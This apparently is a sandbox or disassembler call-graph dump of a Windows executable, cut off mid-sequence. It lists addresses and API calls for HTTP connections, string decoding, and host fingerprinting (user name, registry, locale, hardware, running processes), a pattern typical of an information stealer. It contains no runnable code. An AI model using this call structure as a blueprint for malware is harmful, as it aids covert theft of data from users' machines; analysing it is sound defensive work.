416ea0 lstrcpy 81877->81878 81879 40474d 81878->81879 81880 404763 InternetConnectA 81879->81880 81880->81836 81881 404793 HttpOpenRequestA 81880->81881 81883 4047e8 81881->81883 81884 404b7e InternetCloseHandle 81881->81884 81885 416fb0 4 API calls 81883->81885 81884->81836 81886 4047fc 81885->81886 81887 416ea0 lstrcpy 81886->81887 81888 404805 81887->81888 81889 416f20 3 API calls 81888->81889 81890 404823 81889->81890 81891 416ea0 lstrcpy 81890->81891 81892 40482c 81891->81892 81893 416fb0 4 API calls 81892->81893 81894 40484b 81893->81894 81895 416ea0 lstrcpy 81894->81895 81896 404854 81895->81896 81897 416fb0 4 API calls 81896->81897 81898 404875 81897->81898 81899 416ea0 lstrcpy 81898->81899 81900 40487e 81899->81900 81901 416fb0 4 API calls 81900->81901 81902 40489e 81901->81902 81903 416ea0 lstrcpy 81902->81903 81904 4048a7 81903->81904 81905 416fb0 4 API calls 81904->81905 81906 4048c6 81905->81906 81907 416ea0 lstrcpy 81906->81907 81908 4048cf 81907->81908 81909 416f20 3 API calls 81908->81909 81910 4048ed 81909->81910 81911 416ea0 lstrcpy 81910->81911 81912 4048f6 81911->81912 81913 416fb0 4 API calls 81912->81913 81914 404915 81913->81914 81915 416ea0 lstrcpy 81914->81915 81916 40491e 81915->81916 81917 416fb0 4 API calls 81916->81917 81918 40493d 81917->81918 81919 416ea0 lstrcpy 81918->81919 81920 404946 81919->81920 81921 416f20 3 API calls 81920->81921 81922 404964 81921->81922 81923 416ea0 lstrcpy 81922->81923 81924 40496d 81923->81924 81925 416fb0 4 API calls 81924->81925 81926 40498c 81925->81926 81927 416ea0 lstrcpy 81926->81927 81928 404995 81927->81928 81929 416fb0 4 API calls 81928->81929 81930 4049b6 81929->81930 81931 416ea0 lstrcpy 81930->81931 81932 4049bf 81931->81932 81933 416fb0 4 API calls 81932->81933 81934 4049df 81933->81934 81935 416ea0 lstrcpy 81934->81935 81936 4049e8 81935->81936 81937 416fb0 4 API calls 81936->81937 81938 404a07 81937->81938 81939 416ea0 lstrcpy 81938->81939 81940 404a10 81939->81940 81941 416f20 3 API calls 81940->81941 81942 404a2e 81941->81942 81943 416ea0 lstrcpy 81942->81943 81944 404a37 81943->81944 81945 416d40 lstrcpy 81944->81945 81946 404a52 81945->81946 81947 416f20 3 API calls 81946->81947 81948 404a73 81947->81948 81949 416f20 3 API calls 81948->81949 81950 404a7a 81949->81950 81951 416ea0 lstrcpy 81950->81951 81952 404a86 81951->81952 81953 404aa7 lstrlen 81952->81953 81954 404aba 81953->81954 81955 404ac3 lstrlen 81954->81955 82866 4170d0 81955->82866 81957 404ad3 HttpSendRequestA 81958 404af2 InternetReadFile 81957->81958 81959 404b27 InternetCloseHandle 81958->81959 81964 404b1e 81958->81964 81962 416e00 81959->81962 81961 416fb0 4 API calls 81961->81964 81962->81884 81963 416ea0 lstrcpy 81963->81964 81964->81958 81964->81959 81964->81961 81964->81963 82876 4170d0 81965->82876 81967 40fb04 StrCmpCA 81968 40fb17 81967->81968 81969 40fb0f ExitProcess 81967->81969 81970 40fb27 strtok_s 81968->81970 81973 40fb34 81970->81973 81971 40fccc 81971->81019 81972 40fca8 strtok_s 81972->81973 81973->81971 81973->81972 81974 40fc8b StrCmpCA 81973->81974 81975 40fc6c StrCmpCA 81973->81975 81976 40fb9d StrCmpCA 81973->81976 81977 40fbed StrCmpCA 81973->81977 81978 40fc4d StrCmpCA 81973->81978 81979 40fc2e StrCmpCA 81973->81979 81980 40fbbf StrCmpCA 81973->81980 81981 40fc0f StrCmpCA 81973->81981 81982 416e20 lstrlen lstrcpy 81973->81982 81974->81972 81974->81973 81975->81973 81976->81973 81977->81973 81978->81973 81979->81973 81980->81973 81981->81973 81982->81973 81984 416da0 lstrcpy 81983->81984 81985 401513 81984->81985 81986 416da0 lstrcpy 81985->81986 81987 401525 81986->81987 81988 416da0 lstrcpy 81987->81988 81989 401537 81988->81989 81990 416da0 lstrcpy 81989->81990 81991 401549 81990->81991 81992 405610 81991->81992 81993 416da0 lstrcpy 81992->81993 81994 405629 81993->81994 81995 404470 3 API calls 81994->81995 81996 405635 81995->81996 81997 416d40 lstrcpy 81996->81997 81998 40566a 81997->81998 81999 416d40 lstrcpy 81998->81999 82000 405677 81999->82000 82001 416d40 lstrcpy 82000->82001 82002 405684 82001->82002 82003 416d40 lstrcpy 82002->82003 82004 405691 82003->82004 82005 416d40 lstrcpy 82004->82005 82006 40569e InternetOpenA StrCmpCA 82005->82006 82007 4056cd 82006->82007 82008 405c70 InternetCloseHandle 82007->82008 82010 415260 3 API calls 82007->82010 82009 405c8d 82008->82009 82012 4094a0 4 API calls 82009->82012 82011 4056ec 82010->82011 82013 416f20 3 API calls 82011->82013 82014 405c93 82012->82014 82015 4056ff 82013->82015 82017 416e20 2 API calls 82014->82017 82021 405ccc codecvt 82014->82021 82016 416ea0 lstrcpy 82015->82016 82020 405708 82016->82020 82018 405caa 82017->82018 82019 416fb0 4 API calls 82018->82019 82022 405cc0 82019->82022 82025 416fb0 4 API calls 82020->82025 82024 416da0 lstrcpy 82021->82024 82023 416ea0 lstrcpy 82022->82023 82023->82021 82033 405cfc 82024->82033 82026 405732 82025->82026 82027 416ea0 lstrcpy 82026->82027 82028 40573b 82027->82028 82029 416fb0 4 API calls 82028->82029 82030 40575a 82029->82030 82031 416ea0 lstrcpy 82030->82031 82032 405763 82031->82032 82034 416f20 3 API calls 82032->82034 82033->81025 82035 405781 82034->82035 82036 416ea0 lstrcpy 82035->82036 82037 40578a 82036->82037 82038 416fb0 4 API calls 82037->82038 82039 4057a9 82038->82039 82040 416ea0 lstrcpy 82039->82040 82041 4057b2 82040->82041 82042 416fb0 4 API calls 82041->82042 82043 4057d1 82042->82043 82044 416ea0 lstrcpy 82043->82044 82045 4057da 82044->82045 82046 416fb0 4 API calls 82045->82046 82047 405806 82046->82047 82048 416f20 3 API calls 82047->82048 82049 40580d 82048->82049 82050 416ea0 lstrcpy 82049->82050 82051 405816 82050->82051 82052 40582c InternetConnectA 82051->82052 82052->82008 82053 40585c HttpOpenRequestA 82052->82053 82055 405c63 InternetCloseHandle 82053->82055 82056 4058bb 82053->82056 82055->82008 82057 416fb0 4 API calls 82056->82057 82058 4058cf 82057->82058 82059 416ea0 lstrcpy 82058->82059 82060 4058d8 82059->82060 82061 416f20 3 API calls 82060->82061 82062 4058f6 82061->82062 82063 416ea0 lstrcpy 82062->82063 82064 4058ff 82063->82064 82065 416fb0 4 API calls 82064->82065 82066 40591e 82065->82066 82067 416ea0 lstrcpy 82066->82067 82068 405927 82067->82068 82069 416fb0 4 API calls 82068->82069 82070 405948 82069->82070 82071 416ea0 lstrcpy 82070->82071 82072 405951 82071->82072 82073 416fb0 4 API calls 82072->82073 82074 405971 82073->82074 82075 416ea0 lstrcpy 82074->82075 82076 40597a 82075->82076 82077 416fb0 4 API calls 82076->82077 82078 405999 82077->82078 82079 416ea0 lstrcpy 82078->82079 82080 4059a2 82079->82080 82081 416f20 3 API calls 82080->82081 82082 4059c0 82081->82082 82083 416ea0 lstrcpy 82082->82083 82084 4059c9 82083->82084 82085 416fb0 4 API calls 82084->82085 82086 4059e8 82085->82086 82087 416ea0 lstrcpy 82086->82087 82088 4059f1 82087->82088 82089 416fb0 4 API calls 82088->82089 82090 405a10 82089->82090 82091 416ea0 lstrcpy 82090->82091 82092 405a19 82091->82092 82093 416f20 3 API calls 82092->82093 82094 405a37 82093->82094 82095 416ea0 lstrcpy 82094->82095 82096 405a40 82095->82096 82097 416fb0 4 API calls 82096->82097 82098 405a5f 82097->82098 82099 416ea0 lstrcpy 82098->82099 82100 405a68 82099->82100 82101 416fb0 4 API calls 82100->82101 82102 405a89 82101->82102 82103 416ea0 lstrcpy 82102->82103 82104 405a92 82103->82104 82105 416fb0 4 API calls 82104->82105 82106 405ab2 82105->82106 82107 416ea0 lstrcpy 82106->82107 82108 405abb 82107->82108 82109 416fb0 4 API calls 82108->82109 82110 405ada 82109->82110 82111 416ea0 lstrcpy 82110->82111 82112 405ae3 82111->82112 82113 416f20 3 API calls 82112->82113 82114 405b01 82113->82114 82115 416ea0 lstrcpy 82114->82115 82116 405b0a 82115->82116 82117 405b1d lstrlen 82116->82117 82877 4170d0 82117->82877 82119 405b2e lstrlen GetProcessHeap HeapAlloc 82878 4170d0 82119->82878 82121 405b5b lstrlen 82879 4170d0 82121->82879 82123 405b6b memcpy 82880 4170d0 82123->82880 82125 405b84 lstrlen 82126 405b94 82125->82126 82127 405b9d lstrlen memcpy 82126->82127 82881 4170d0 82127->82881 82129 405bc7 lstrlen 82882 4170d0 82129->82882 82131 405bd7 HttpSendRequestA 82132 405be2 InternetReadFile 82131->82132 82133 405c17 InternetCloseHandle 82132->82133 82137 405c0e 82132->82137 82133->82055 82135 416fb0 4 API calls 82135->82137 82136 416ea0 lstrcpy 82136->82137 82137->82132 82137->82133 82137->82135 82137->82136 82883 4170d0 82138->82883 82140 40f3d7 strtok_s 82142 40f3e4 82140->82142 82141 40f4b1 82141->81027 82142->82141 82143 40f48d strtok_s 82142->82143 82144 416e20 lstrlen lstrcpy 82142->82144 82143->82142 82144->82142 82884 4170d0 82145->82884 82147 40f227 strtok_s 82150 40f234 82147->82150 82148 40f387 82148->81035 82149 40f363 strtok_s 82149->82150 82150->82148 82150->82149 82151 40f314 StrCmpCA 82150->82151 82152 40f297 StrCmpCA 82150->82152 82153 40f2d7 StrCmpCA 82150->82153 82154 416e20 lstrlen lstrcpy 82150->82154 82151->82150 82152->82150 82153->82150 82154->82150 82156 416d40 lstrcpy 82155->82156 82157 40fd26 82156->82157 82158 416fb0 4 API calls 82157->82158 82159 40fd37 82158->82159 82160 416ea0 lstrcpy 82159->82160 82161 40fd40 82160->82161 82162 416fb0 4 API calls 82161->82162 82163 40fd5b 82162->82163 82164 416ea0 lstrcpy 82163->82164 82165 40fd64 82164->82165 82166 416fb0 4 API calls 82165->82166 82167 40fd7d 82166->82167 82168 416ea0 lstrcpy 82167->82168 82169 40fd86 82168->82169 82170 416fb0 4 API calls 82169->82170 82171 40fda1 82170->82171 82172 416ea0 lstrcpy 82171->82172 82173 40fdaa 82172->82173 82174 416fb0 4 API calls 82173->82174 82175 40fdc3 82174->82175 82176 416ea0 lstrcpy 82175->82176 82177 40fdcc 82176->82177 82178 416fb0 4 API calls 82177->82178 82179 40fde7 82178->82179 82180 416ea0 lstrcpy 82179->82180 82181 40fdf0 82180->82181 82182 416fb0 4 API calls 82181->82182 82183 40fe09 82182->82183 82184 416ea0 lstrcpy 82183->82184 82185 40fe12 82184->82185 82186 416fb0 4 API calls 82185->82186 82187 40fe2d 82186->82187 82188 416ea0 lstrcpy 82187->82188 82189 40fe36 82188->82189 82190 416fb0 4 API calls 82189->82190 82191 40fe4f 82190->82191 82192 416ea0 lstrcpy 82191->82192 82193 40fe58 82192->82193 82194 416fb0 4 API calls 82193->82194 82195 40fe76 82194->82195 82196 416ea0 lstrcpy 82195->82196 82197 40fe7f 82196->82197 82198 4141c0 6 API calls 82197->82198 82199 40fe96 82198->82199 82200 416f20 3 API calls 82199->82200 82201 40fea9 82200->82201 82202 416ea0 lstrcpy 82201->82202 82203 40feb2 82202->82203 82204 416fb0 4 API calls 82203->82204 82205 40fedc 82204->82205 82206 416ea0 lstrcpy 82205->82206 82207 40fee5 82206->82207 82208 416fb0 4 API calls 82207->82208 82209 40ff05 82208->82209 82210 416ea0 lstrcpy 82209->82210 82211 40ff0e 82210->82211 82885 414300 GetProcessHeap HeapAlloc RegOpenKeyExA 82211->82885 82213 40ff1e 82214 416fb0 4 API calls 82213->82214 82215 40ff2e 82214->82215 82216 416ea0 lstrcpy 82215->82216 82217 40ff37 82216->82217 82218 416fb0 4 API calls 82217->82218 82219 40ff56 82218->82219 82220 416ea0 lstrcpy 82219->82220 82221 40ff5f 82220->82221 82222 416fb0 4 API calls 82221->82222 82223 40ff80 82222->82223 82224 416ea0 lstrcpy 82223->82224 82225 40ff89 82224->82225 82888 414380 GetCurrentProcess IsWow64Process 82225->82888 82228 416fb0 4 API calls 82229 40ffa9 82228->82229 82230 416ea0 lstrcpy 82229->82230 82231 40ffb2 82230->82231 82232 416fb0 4 API calls 82231->82232 82233 40ffd1 82232->82233 82234 416ea0 lstrcpy 82233->82234 82235 40ffda 82234->82235 82236 416fb0 4 API calls 82235->82236 82237 40fffb 82236->82237 82238 416ea0 lstrcpy 82237->82238 82239 410004 82238->82239 82890 4143c0 GetProcessHeap HeapAlloc GetUserNameA 82239->82890 82241 410014 82242 416fb0 4 API calls 82241->82242 82243 410024 82242->82243 82244 416ea0 lstrcpy 82243->82244 82245 41002d 82244->82245 82246 416fb0 4 API calls 82245->82246 82247 41004c 82246->82247 82248 416ea0 lstrcpy 82247->82248 82249 410055 82248->82249 82250 416fb0 4 API calls 82249->82250 82251 410075 82250->82251 82252 416ea0 lstrcpy 82251->82252 82253 41007e 82252->82253 82254 414400 3 API calls 82253->82254 82255 41008e 82254->82255 82256 416fb0 4 API calls 82255->82256 82257 41009e 82256->82257 82258 416ea0 lstrcpy 82257->82258 82259 4100a7 82258->82259 82260 416fb0 4 API calls 82259->82260 82261 4100c6 82260->82261 82262 416ea0 lstrcpy 82261->82262 82263 4100cf 82262->82263 82264 416fb0 4 API calls 82263->82264 82265 4100f0 82264->82265 82266 416ea0 lstrcpy 82265->82266 82267 4100f9 82266->82267 82891 414450 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 82267->82891 82269 410109 82270 416fb0 4 API calls 82269->82270 82271 410119 82270->82271 82272 416ea0 lstrcpy 82271->82272 82273 410122 82272->82273 82274 416fb0 4 API calls 82273->82274 82275 410141 82274->82275 82276 416ea0 lstrcpy 82275->82276 82277 41014a 82276->82277 82278 416fb0 4 API calls 82277->82278 82279 41016b 82278->82279 82280 416ea0 lstrcpy 82279->82280 82281 410174 82280->82281 82892 4144b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 82281->82892 82284 416fb0 4 API calls 82285 410194 82284->82285 82286 416ea0 lstrcpy 82285->82286 82287 41019d 82286->82287 82288 416fb0 4 API calls 82287->82288 82289 4101bc 82288->82289 82290 416ea0 lstrcpy 82289->82290 82291 4101c5 82290->82291 82292 416fb0 4 API calls 82291->82292 82293 4101e5 82292->82293 82294 416ea0 lstrcpy 82293->82294 82295 4101ee 82294->82295 82895 414530 GetUserDefaultLocaleName 82295->82895 82298 416fb0 4 API calls 82299 41020e 82298->82299 82300 416ea0 lstrcpy 82299->82300 82301 410217 82300->82301 82302 416fb0 4 API calls 82301->82302 82303 410236 82302->82303 82304 416ea0 lstrcpy 82303->82304 82305 41023f 82304->82305 82306 416fb0 4 API calls 82305->82306 82307 410260 82306->82307 82308 416ea0 lstrcpy 82307->82308 82309 410269 82308->82309 82900 414570 82309->82900 82311 410280 82312 416f20 3 API calls 82311->82312 82313 410293 82312->82313 82314 416ea0 lstrcpy 82313->82314 82315 41029c 82314->82315 82316 416fb0 4 API calls 82315->82316 82317 4102c6 82316->82317 82318 416ea0 lstrcpy 82317->82318 82319 4102cf 82318->82319 82320 416fb0 4 API calls 82319->82320 82321 4102ef 82320->82321 82322 416ea0 lstrcpy 82321->82322 82323 4102f8 82322->82323 82912 414710 GetSystemPowerStatus 82323->82912 82326 416fb0 4 API calls 82327 410318 82326->82327 82328 416ea0 lstrcpy 82327->82328 82329 410321 82328->82329 82330 416fb0 4 API calls 82329->82330 82331 410340 82330->82331 82332 416ea0 lstrcpy 82331->82332 82333 410349 82332->82333 82334 416fb0 4 API calls 82333->82334 82335 41036a 82334->82335 82336 416ea0 lstrcpy 82335->82336 82337 410373 82336->82337 82338 41037e GetCurrentProcessId 82337->82338 82914 415b70 OpenProcess 82338->82914 82341 416f20 3 API calls 82342 4103a4 82341->82342 82343 416ea0 lstrcpy 82342->82343 82344 4103ad 82343->82344 82345 416fb0 4 API calls 82344->82345 82346 4103d7 82345->82346 82347 416ea0 lstrcpy 82346->82347 82348 4103e0 82347->82348 82349 416fb0 4 API calls 82348->82349 82350 410400 82349->82350 82351 416ea0 lstrcpy 82350->82351 82352 410409 82351->82352 82919 414740 GetProcessHeap HeapAlloc RegOpenKeyExA 82352->82919 82354 410419 82355 416fb0 4 API calls 82354->82355 82356 410429 82355->82356 82357 416ea0 lstrcpy 82356->82357 82358 410432 82357->82358 82359 416fb0 4 API calls 82358->82359 82360 410451 82359->82360 82361 416ea0 lstrcpy 82360->82361 82362 41045a 82361->82362 82363 416fb0 4 API calls 82362->82363 82364 41047b 82363->82364 82365 416ea0 lstrcpy 82364->82365 82366 410484 82365->82366 82922 414800 82366->82922 82369 416fb0 4 API calls 82370 4104a4 82369->82370 82371 416ea0 lstrcpy 82370->82371 82372 4104ad 82371->82372 82373 416fb0 4 API calls 82372->82373 82374 4104cc 82373->82374 82375 416ea0 lstrcpy 82374->82375 82376 4104d5 82375->82376 82377 416fb0 4 API calls 82376->82377 82378 4104f6 82377->82378 82379 416ea0 lstrcpy 82378->82379 82380 4104ff 82379->82380 82937 4147c0 GetSystemInfo wsprintfA 82380->82937 82382 41050f 82383 416fb0 4 API calls 82382->82383 82384 41051f 82383->82384 82385 416ea0 lstrcpy 82384->82385 82386 410528 82385->82386 82387 416fb0 4 API calls 82386->82387 82388 410547 82387->82388 82389 416ea0 lstrcpy 82388->82389 82390 410550 82389->82390 82391 416fb0 4 API calls 82390->82391 82392 410570 82391->82392 82393 416ea0 lstrcpy 82392->82393 82394 410579 82393->82394 82938 414960 GetProcessHeap HeapAlloc 82394->82938 82396 410589 82397 416fb0 4 API calls 82396->82397 82398 410599 82397->82398 82399 416ea0 lstrcpy 82398->82399 82400 4105a2 82399->82400 82401 416fb0 4 API calls 82400->82401 82402 4105c1 82401->82402 82403 416ea0 lstrcpy 82402->82403 82404 4105ca 82403->82404 82405 416fb0 4 API calls 82404->82405 82406 4105eb 82405->82406 82407 416ea0 lstrcpy 82406->82407 82408 4105f4 82407->82408 82943 414ed0 82408->82943 82411 416f20 3 API calls 82412 41061e 82411->82412 82413 416ea0 lstrcpy 82412->82413 82414 410627 82413->82414 82415 416fb0 4 API calls 82414->82415 82416 410651 82415->82416 82417 416ea0 lstrcpy 82416->82417 82418 41065a 82417->82418 82419 416fb0 4 API calls 82418->82419 82420 41067a 82419->82420 82421 416ea0 lstrcpy 82420->82421 82422 410683 82421->82422 82423 416fb0 4 API calls 82422->82423 82424 4106a2 82423->82424 82425 416ea0 lstrcpy 82424->82425 82426 4106ab 82425->82426 82948 414a00 82426->82948 82428 4106c2 82429 416f20 3 API calls 82428->82429 82430 4106d5 82429->82430 82431 416ea0 lstrcpy 82430->82431 82432 4106de 82431->82432 82433 416fb0 4 API calls 82432->82433 82434 41070a 82433->82434 82435 416ea0 lstrcpy 82434->82435 82436 410713 82435->82436 82437 416fb0 4 API calls 82436->82437 82438 410732 82437->82438 82439 416ea0 lstrcpy 82438->82439 82440 41073b 82439->82440 82441 416fb0 4 API calls 82440->82441 82442 41075c 82441->82442 82443 416ea0 lstrcpy 82442->82443 82444 410765 82443->82444 82445 416fb0 4 API calls 82444->82445 82446 410784 82445->82446 82447 416ea0 lstrcpy 82446->82447 82448 41078d 82447->82448 82449 416fb0 4 API calls 82448->82449 82450 4107ae 82449->82450 82451 416ea0 lstrcpy 82450->82451 82452 4107b7 82451->82452 82956 414ae0 82452->82956 82454 4107d3 82455 416f20 3 API calls 82454->82455 82456 4107e6 82455->82456 82457 416ea0 lstrcpy 82456->82457 82458 4107ef 82457->82458 82459 416fb0 4 API calls 82458->82459 82460 410819 82459->82460 82461 416ea0 lstrcpy 82460->82461 82462 410822 82461->82462 82463 416fb0 4 API calls 82462->82463 82464 410843 82463->82464 82465 416ea0 lstrcpy 82464->82465 82466 41084c 82465->82466 82467 414ae0 17 API calls 82466->82467 82468 410868 82467->82468 82469 416f20 3 API calls 82468->82469 82470 41087b 82469->82470 82471 416ea0 lstrcpy 82470->82471 82472 410884 82471->82472 82473 416fb0 4 API calls 82472->82473 82474 4108ae 82473->82474 82475 416ea0 lstrcpy 82474->82475 82476 4108b7 82475->82476 82477 416fb0 4 API calls 82476->82477 82478 4108d6 82477->82478 82479 416ea0 lstrcpy 82478->82479 82480 4108df 82479->82480 82481 416fb0 4 API calls 82480->82481 82482 410900 82481->82482 82483 416ea0 lstrcpy 82482->82483 82484 410909 82483->82484 82992 414de0 82484->82992 82486 410920 82487 416f20 3 API calls 82486->82487 82488 410933 82487->82488 82489 416ea0 lstrcpy 82488->82489 82490 41093c 82489->82490 82491 41095a lstrlen 82490->82491 82492 41096a 82491->82492 82493 416d40 lstrcpy 82492->82493 82494 41097c 82493->82494 82495 401500 lstrcpy 82494->82495 82496 41098a 82495->82496 83002 404dc0 82496->83002 82498 410996 82498->81039 83182 4170d0 82499->83182 82501 404cc9 InternetOpenUrlA 82505 404ce1 82501->82505 82502 404cea InternetReadFile 82502->82505 82503 404d5c InternetCloseHandle InternetCloseHandle 82504 404da8 82503->82504 82504->81043 82505->82502 82505->82503 83183 4092b0 82506->83183 82508 40ef93 82509 40efb4 82508->82509 82510 40f1cf 82508->82510 82513 40efcd StrCmpCA 82509->82513 82511 401500 lstrcpy 82510->82511 82512 40f1dd 82511->82512 83347 40ea90 82512->83347 82515 40f04f 82513->82515 82516 40efd8 82513->82516 82519 40f06e StrCmpCA 82515->82519 82518 416da0 lstrcpy 82516->82518 82520 40eff0 82518->82520 82521 40f07d 82519->82521 82558 40f14e 82519->82558 82522 401500 lstrcpy 82520->82522 82524 416d40 lstrcpy 82521->82524 82523 40f01e 82522->82523 82525 416da0 lstrcpy 82523->82525 82527 40f08a 82524->82527 82528 40f032 82525->82528 82526 40f17d StrCmpCA 82529 40f188 82526->82529 82530 40f1c7 82526->82530 82531 416fb0 4 API calls 82527->82531 82532 416da0 lstrcpy 82528->82532 82533 401500 lstrcpy 82529->82533 82530->81047 82534 40f0b2 82531->82534 82535 40f04a 82532->82535 82536 40f196 82533->82536 82537 416f20 3 API calls 82534->82537 83186 40e420 82535->83186 82540 416da0 lstrcpy 82536->82540 82538 40f0b9 82537->82538 82541 416fb0 4 API calls 82538->82541 82542 40f1aa 82540->82542 82543 416da0 lstrcpy 82542->82543 82558->82526 82841 404486 82840->82841 82872 414ff0 malloc 82841->82872 82843 4044af 82873 414ff0 malloc 82843->82873 82845 4044c5 82874 414ff0 malloc 82845->82874 82847 4044db 82848 4044f5 lstrlen 82847->82848 82875 4170d0 82848->82875 82850 404505 InternetCrackUrlA 82851 404524 82850->82851 82851->81824 82853 416d40 lstrcpy 82852->82853 82854 415274 82853->82854 82855 416d40 lstrcpy 82854->82855 82856 415282 GetSystemTime 82855->82856 82857 415299 82856->82857 82858 416da0 lstrcpy 82857->82858 82859 4152fc 82858->82859 82859->81839 82861 416f31 82860->82861 82862 416f88 82861->82862 82864 416f68 lstrcpy lstrcat 82861->82864 82863 416da0 lstrcpy 82862->82863 82865 416f94 82863->82865 82864->82862 82865->81842 82866->81957 82868 4094d9 LocalAlloc 82867->82868 82869 404bae 82867->82869 82868->82869 82870 4094f4 CryptStringToBinaryA 82868->82870 82869->81845 82869->81848 82870->82869 82871 409519 LocalFree 82870->82871 82871->82869 82872->82843 82873->82845 82874->82847 82875->82850 82876->81967 82877->82119 82878->82121 82879->82123 82880->82125 82881->82129 82882->82131 82883->82140 82884->82147 82886 414362 RegCloseKey 82885->82886 82887 414345 RegQueryValueExA 82885->82887 82886->82213 82887->82886 82889 40ff99 82888->82889 82889->82228 82890->82241 82891->82269 82893 4144f7 wsprintfA 82892->82893 82894 410184 82892->82894 82893->82894 82894->82284 82896 4101fe 82895->82896 82897 41455a 82895->82897 82896->82298 83164 415420 LocalAlloc CharToOemW 82897->83164 82899 414566 82899->82896 82901 416d40 lstrcpy 82900->82901 82902 414589 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 82901->82902 82910 4145e2 82902->82910 82903 414603 GetLocaleInfoA 82903->82910 82904 4146d5 82905 4146e5 82904->82905 82906 4146db LocalFree 82904->82906 82907 416da0 lstrcpy 82905->82907 82906->82905 82909 4146f4 82907->82909 82908 416fb0 lstrcpy lstrlen lstrcpy lstrcat 82908->82910 82909->82311 82910->82903 82910->82904 82910->82908 82911 416ea0 lstrcpy 82910->82911 82911->82910 82913 410308 82912->82913 82913->82326 82915 415b93 K32GetModuleFileNameExA CloseHandle 82914->82915 82916 415bb5 82914->82916 82915->82916 82917 416d40 lstrcpy 82916->82917 82918 410391 82917->82918 82918->82341 82920 4147a2 RegCloseKey 82919->82920 82921 414785 RegQueryValueExA 82919->82921 82920->82354 82921->82920 82923 414836 GetLogicalProcessorInformationEx 82922->82923 82924 414855 GetLastError 82923->82924 82932 4148ab 82923->82932 82925 414860 82924->82925 82926 41489f 82924->82926 82927 414869 82925->82927 82936 410494 82926->82936 83168 4150f0 GetProcessHeap HeapFree 82926->83168 82927->82923 82934 414893 82927->82934 83165 4150f0 GetProcessHeap HeapFree 82927->83165 83166 415110 GetProcessHeap HeapAlloc 82927->83166 83167 4150f0 GetProcessHeap HeapFree 82932->83167 82933 4148fd 82935 414906 wsprintfA 82933->82935 82933->82936 82934->82936 82935->82936 82936->82369 82937->82382 82939 415090 82938->82939 82940 41498a GlobalMemoryStatusEx 82939->82940 82942 4149a0 __aulldiv 82940->82942 82941 4149d8 wsprintfA 82941->82396 82942->82941 82944 414ee8 GetProcessHeap HeapAlloc wsprintfA 82943->82944 82946 416d40 lstrcpy 82944->82946 82947 41060b 82946->82947 82947->82411 82949 416d40 lstrcpy 82948->82949 82954 414a16 82949->82954 82950 414a50 82952 416da0 lstrcpy 82950->82952 82951 416fb0 lstrcpy lstrlen lstrcpy lstrcat 82951->82954 82953 414ac9 82952->82953 82953->82428 82954->82950 82954->82951 82955 416ea0 lstrcpy 82954->82955 82955->82954 82957 416d40 lstrcpy 82956->82957 82958 414af9 RegOpenKeyExA 82957->82958 82959 414b4b 82958->82959 82960 414b6d 82958->82960 82961 416da0 lstrcpy 82959->82961 82962 414db0 RegCloseKey 82960->82962 82963 414b95 RegEnumKeyExA 82960->82963 82973 414b5a 82961->82973 82966 416da0 lstrcpy 82962->82966 82964 414dab 82963->82964 82965 414bdc wsprintfA RegOpenKeyExA 82963->82965 82964->82962 82967 414c22 RegCloseKey RegCloseKey 82965->82967 82968 414c5e RegQueryValueExA 82965->82968 82966->82973 82969 416da0 lstrcpy 82967->82969 82970 414c97 lstrlen 82968->82970 82971 414d9e RegCloseKey 82968->82971 82969->82973 82970->82971 82972 414cad 82970->82972 82971->82964 82974 416fb0 4 API calls 82972->82974 82973->82454 82975 414cc4 82974->82975 82976 416ea0 lstrcpy 82975->82976 82977 414cd0 82976->82977 82978 416fb0 4 API calls 82977->82978 82979 414cf4 82978->82979 82980 416ea0 lstrcpy 82979->82980 82981 414d00 82980->82981 82982 414d0b RegQueryValueExA 82981->82982 82982->82971 82983 414d40 82982->82983 82984 416fb0 4 API calls 82983->82984 82985 414d57 82984->82985 82986 416ea0 lstrcpy 82985->82986 82987 414d63 82986->82987 82988 416fb0 4 API calls 82987->82988 82989 414d87 82988->82989 82990 416ea0 lstrcpy 82989->82990 82991 414d93 82990->82991 82991->82971 82993 416d40 lstrcpy 82992->82993 82994 414df9 CreateToolhelp32Snapshot Process32First 82993->82994 82995 414e25 Process32Next 82994->82995 82996 414e9a FindCloseChangeNotification 82994->82996 82995->82996 83001 414e3a 82995->83001 82997 416da0 lstrcpy 82996->82997 82999 414eb3 82997->82999 82998 416fb0 lstrcpy lstrlen lstrcpy lstrcat 82998->83001 82999->82486 83000 416ea0 lstrcpy 83000->83001 83001->82995 83001->82998 83001->83000 83003 416da0 lstrcpy 83002->83003 83004 404dd9 83003->83004 83005 404470 3 API calls 83004->83005 83006 404de5 83005->83006 83169 4155a0 83006->83169 83008 404e3e 83009 404e49 lstrlen 83008->83009 83010 404e59 83009->83010 83011 4155a0 4 API calls 83010->83011 83012 404e6a 83011->83012 83013 416d40 lstrcpy 83012->83013 83014 404e7d 83013->83014 83015 416d40 lstrcpy 83014->83015 83016 404e8a 83015->83016 83017 416d40 lstrcpy 83016->83017 83018 404e97 83017->83018 83019 416d40 lstrcpy 83018->83019 83020 404ea4 83019->83020 83021 416d40 lstrcpy 83020->83021 83022 404eb1 InternetOpenA StrCmpCA 83021->83022 83023 404ee3 83022->83023 83024 405578 InternetCloseHandle 83023->83024 83025 415260 3 API calls 83023->83025 83031 40558d codecvt 83024->83031 83026 404f02 83025->83026 83027 416f20 3 API calls 83026->83027 83028 404f15 83027->83028 83029 416ea0 lstrcpy 83028->83029 83030 404f1e 83029->83030 83032 416fb0 4 API calls 83030->83032 83034 416da0 lstrcpy 83031->83034 83033 404f5f 83032->83033 83035 416f20 3 API calls 83033->83035 83042 4055c7 83034->83042 83036 404f66 83035->83036 83037 416fb0 4 API calls 83036->83037 83038 404f6d 83037->83038 83039 416ea0 lstrcpy 83038->83039 83040 404f76 83039->83040 83041 416fb0 4 API calls 83040->83041 83043 404fb7 83041->83043 83042->82498 83044 416f20 3 API calls 83043->83044 83045 404fbe 83044->83045 83046 416ea0 lstrcpy 83045->83046 83047 404fc7 83046->83047 83048 404fdd InternetConnectA 83047->83048 83048->83024 83049 40500d HttpOpenRequestA 83048->83049 83051 40556b InternetCloseHandle 83049->83051 83052 40506b 83049->83052 83051->83024 83053 416fb0 4 API calls 83052->83053 83054 40507f 83053->83054 83055 416ea0 lstrcpy 83054->83055 83056 405088 83055->83056 83057 416f20 3 API calls 83056->83057 83058 4050a6 83057->83058 83059 416ea0 lstrcpy 83058->83059 83060 4050af 83059->83060 83061 416fb0 4 API calls 83060->83061 83062 4050ce 83061->83062 83063 416ea0 lstrcpy 83062->83063 83064 